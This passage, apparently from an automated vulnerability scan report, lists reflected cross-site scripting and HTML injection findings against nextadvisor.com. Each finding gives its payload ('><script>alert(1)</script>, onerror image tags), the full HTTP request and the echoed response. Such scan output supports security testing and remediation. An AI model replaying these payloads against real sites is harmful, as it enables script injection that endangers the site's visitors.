The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b33a"><script>alert(1)</script>b562ccaade5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /identity_theft_protection_services9b33a"><script>alert(1)</script>b562ccaade5/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:21:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=fb761144d7afda6f242fd2f27366b224; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services9b33a"><script>alert(1)</script>b562ccaade5/index.php" />
...[SNIP]...

2.74. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304 was submitted in the REST URL parameter 1. This input was echoed as b5c82'><img src=a onerror=alert(1)>795db6ed304 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /identity_theft_protection_servicesb5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:21:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=3251f81a42a4bd734a4271415a2d5061; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/identity_theft_protection_servicesb5c82'><img src=a onerror=alert(1)>795db6ed304/index.php' class='nav_select'>
...[SNIP]...

2.75. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c97f9"><script>alert(1)</script>806bcf582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /identity_theft_protection_services/index.phpc97f9"><script>alert(1)</script>806bcf582e?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:21:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=821cb93b5cbac25bee1883f710d9cdbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services/index.phpc97f9"><script>alert(1)</script>806bcf582e" />
...[SNIP]...

2.76. http://www.nextadvisor.com/identity_theft_protection_services/index.php [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a56"><a>1e5a74a50df was submitted in the a parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /identity_theft_protection_services/index.php?a=2f9a56"><a>1e5a74a50df&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:19:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=8103685e85c7ecc76cab0167a613a3be; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 33960


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="index.php?a=2f9a56"><a>1e5a74a50df&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw" class='link_off'>
...[SNIP]...

2.77. http://www.nextadvisor.com/identity_theft_protection_services/index.php [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728cc"><a>578d1ace82c was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw728cc"><a>578d1ace82c HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:19:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=3512a302a89a5d0b40c718853ad7f013; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 35194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw728cc"><a>578d1ace82c" class='link_off'>
...[SNIP]...

2.78. http://www.nextadvisor.com/identity_theft_protection_services/index.php [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db44"><script>alert(1)</script>902d9f51952 was submitted in the kw parameter. This input was echoed as 8db44\"><script>alert(1)</script>902d9f51952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource8db44"><script>alert(1)</script>902d9f51952&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:19:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=f6f9e694203703d8863b6e6742620e1d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 35757


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="/link.php?kw=gid9a identity theft resource8db44\"><script>alert(1)</script>902d9f51952_ordering176&amp;category=identitytheft&amp;link=idguard&amp;id=223" target="_blank">
...[SNIP]...

2.79. http://www.nextadvisor.com/identity_theft_protection_services/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b99"><a>63ed369bc85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw&c7b99"><a>63ed369bc85=1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e76f9f6cb176380732799063da038778; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 36347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw&c7b99"><a>63ed369bc85=1" class='link_off'>
...[SNIP]...

2.80. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec128"><script>alert(1)</script>8d8e788b495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesec128"><script>alert(1)</script>8d8e788b495/favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:21:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11900


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/imagesec128"><script>alert(1)</script>8d8e788b495/favicon.ico" />
...[SNIP]...

2.81. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423 was submitted in the REST URL parameter 1. This input was echoed as f6085'><img src=a onerror=alert(1)>799b035f423 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /imagesf6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423/favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:21:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/imagesf6085'><img src=a onerror=alert(1)>799b035f423/index.php' class='nav_select'>
...[SNIP]...

2.82. http://www.nextadvisor.com/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429d6"><script>alert(1)</script>7b474b584c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/favicon.ico429d6"><script>alert(1)</script>7b474b584c HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:21:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/favicon.ico429d6"><script>alert(1)</script>7b474b584c" />
...[SNIP]...

2.83. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae was submitted in the REST URL parameter 1. This input was echoed as d7d1a'><img src=a onerror=alert(1)>4107ebce2ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includesd7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae/javascript.php?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:20:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/includesd7d1a'><img src=a onerror=alert(1)>4107ebce2ae/index.php' class='nav_select'>
...[SNIP]...

2.84. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4efa"><script>alert(1)</script>269ce0d3fcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includesc4efa"><script>alert(1)</script>269ce0d3fcb/javascript.php?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:20:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includesc4efa"><script>alert(1)</script>269ce0d3fcb/javascript.php" />
...[SNIP]...

2.85. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cffe4"><script>alert(1)</script>606be9c4018 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/javascript.phpcffe4"><script>alert(1)</script>606be9c4018?script=animatedcollapse.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:20:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.phpcffe4"><script>alert(1)</script>606be9c4018" />
...[SNIP]...

2.86. http://www.startribune.com/business/120319724.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

